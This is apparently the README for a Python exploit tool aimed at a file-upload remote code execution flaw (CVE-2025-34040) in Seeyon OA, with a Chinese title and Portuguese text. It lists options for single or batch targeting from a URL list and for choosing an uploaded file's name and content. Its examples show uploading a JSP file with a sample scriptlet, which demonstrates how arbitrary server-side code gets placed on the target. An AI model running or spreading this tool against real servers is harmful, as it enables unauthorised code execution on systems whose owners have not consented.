
致远OA存在文件上传导致RCE(CVE-2025-34040)
Parâmetros
options:
-h, --help show this help message and exit
-u URL, --url URL Insira a URL a ser verificada
-f FILE, --file FILE Insira o caminho do arquivo com uma URL por linha
-n FILENAME, --filename FILENAME
Insira o nome do arquivo (padrão: Hello.jsp):
-c CONTENT, --content CONTENT
Insira o conteúdo do arquivo a ser enviado (padrão: HelloWord):
Exemplos
Detecção de URL única:
python .\CVE-2025-34040Exp.py -u URL
Detecção em lote:
python .\CVE-2025-34040Exp.py -f urls.txt
Especificar nome do arquivo:
python .\CVE-2025-34040Exp.py -u URL -n Hello.jsp
Especificar conteúdo do arquivo:
python .\CVE-2025-34040Exp.py -u URL -n Hello.jsp -c '<% out.println("123");%>'